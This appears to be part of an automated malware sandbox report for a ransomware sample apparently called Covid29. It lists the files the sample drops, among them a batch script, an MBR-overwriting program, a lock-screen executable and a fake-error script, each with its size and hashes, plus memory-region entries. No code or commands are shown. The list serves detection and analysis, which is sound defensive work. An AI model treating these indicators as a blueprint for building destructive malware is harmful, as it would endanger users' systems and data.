                                          37973f4103ee102d0fdb1e1d6a820be41305dec6293d6d73b55cf34852533392e5aa5c38fd6ed7554fbfca7790e2670d0799774ad64e23c816a48592f623be5f

                                        • C:\Users\Admin\Downloads\source\Cov29Cry\Options.PNG

                                          Filesize

                                          47KB

                                          MD5

                                          cdd3a90a2f2ab81410f356dcb38fc17b

                                          SHA1

                                          66c451a8cad0def71e1216e66741c79e908c3304

                                          SHA256

                                          7b288d1ad9b942447462f51c72fd30e050934240e9f5efa85e73f4f64c3ac1a9

                                          SHA512

                                          90018991d0127a434758d37d41afa047b47493c4a7d503a8c185e569b52ebf3f10b1f899021c946bf599f623db2f6e11f0765f574573ad55fbfc86c776ca3928

                                        • C:\Users\Admin\Downloads\source\Cov29LockScreen.exe

                                          Filesize

                                          48KB

                                          MD5

                                          f724c6da46dc54e6737db821f9b62d77

                                          SHA1

                                          e35d5587326c61f4d7abd75f2f0fc1251b961977

                                          SHA256

                                          6cde4a9f109ae5473703c4f5962f43024d71d2138cbd889223283e7b71e5911c

                                          SHA512

                                          6f83dd7821828771a9cae34881c611522f6b5a567f5832f9e4b9b4b59bf495f40ad78678bd86cba59d32ea8644b4aa5f052552774fea142b9d6da625b55b6afc

                                        • C:\Users\Admin\Downloads\source\Cov29LockScreen\23311_lores.jpg

                                          Filesize

                                          30KB

                                          MD5

                                          108fc794e7171419cf881b4058f88d20

                                          SHA1

                                          dd05defd9fe5fb103db09eb2a3bb72c5ed7d8777

                                          SHA256

                                          741d2576009640a47733a6c724d56ed1a9cee1014cde047b9384181a1758cd34

                                          SHA512

                                          3a1a22217ff636e48612ff3b55ac6611eda6ae0b5a1f4d693440cbd6aef84d6657d3cd076ca828ba828ee556ab64e5bdecb37c1d682590877f3b23345baeb0ea

                                        • C:\Users\Admin\Downloads\source\TrojanRansomCovid29.bat

                                          Filesize

                                          1KB

                                          MD5

                                          57f0432c8e31d4ff4da7962db27ef4e8

                                          SHA1

                                          d5023b3123c0b7fae683588ac0480cd2731a0c5e

                                          SHA256

                                          b82e64e533789c639d8e193b78e06fc028ea227f55d7568865120be080179afc

                                          SHA512

                                          bc082486503a95f8e2ce7689d31423386a03054c5e8e20e61250ca7b7a701e98489f5932eba4837e05ec935057f18633798a10f6f84573a95fcf086ee7cabcbf

                                        • C:\Users\Admin\Downloads\source\fakeerror.vbs

                                          Filesize

                                          144B

                                          MD5

                                          c0437fe3a53e181c5e904f2d13431718

                                          SHA1

                                          44f9547e7259a7fb4fe718e42e499371aa188ab6

                                          SHA256

                                          f2571f03eb9d5ee4dca29a8fec1317ded02973c5dd233d582f56cebe98544f22

                                          SHA512

                                          a6b488fc74dc69fc4227f92a06deb297d19cd54b0e07659f9c9a76ce15d1ef1d8fa4d607acdd03d30d3e2be2a0f59503e27fc95f03f3006e137fa2f92825e7e3

                                        • C:\Users\Admin\Downloads\source\icon.ico

                                          Filesize

                                          147KB

                                          MD5

                                          c2c802b751e5a25b524b9369f583c371

                                          SHA1

                                          eaa3ed8f1c656c3ffb0a434241e65f2dd181ba4d

                                          SHA256

                                          930ab1d5fcd9864c45ad88911b2b13d84b379d0081dbfa114089eb4750c7d04f

                                          SHA512

                                          72716b0c22b82ae3e38e21ad8fbc3c738da8bd3ac437e6ca0b022e0094c1d13a2f65f61e6a5c7fad6ee3fc6240990caa73cd8b0e53cf330a655457c6a2b0c37c

                                        • C:\Users\Admin\Downloads\source\mbr.cpp

                                          Filesize

                                          365B

                                          MD5

                                          d20eddecb5625b60d61d80c067537188

                                          SHA1

                                          8418cb3dd155a9399e7be92da3b4fcd50b559f99

                                          SHA256

                                          45eaa30a90c739fd9fb32d59b29d3e7cd8871431670a3e64d6c34fd53a08f979

                                          SHA512

                                          a0f1578adbabaa0cd5567678ac382637ea078070ef7f567251374ff7f1d1e3e2c6d108471a0cd6aeeb47058d06e0c2bafd0e8f487be04208e44311e478c1f980

                                        • C:\Users\Admin\Downloads\source\mbr.exe.danger

                                          Filesize

                                          1.3MB

                                          MD5

                                          35af6068d91ba1cc6ce21b461f242f94

                                          SHA1

                                          cb054789ff03aa1617a6f5741ad53e4598184ffa

                                          SHA256

                                          9ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e

                                          SHA512

                                          136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169

                                        • memory/3876-527-0x0000000000400000-0x00000000004D8000-memory.dmp

                                          Filesize

                                          864KB

                                        • memory/3916-529-0x0000000000990000-0x00000000009B0000-memory.dmp

                                          Filesize

                                          128KB

                                        • memory/4040-535-0x0000000000EA0000-0x0000000000EC0000-memory.dmp

                                          Filesize

                                          128KB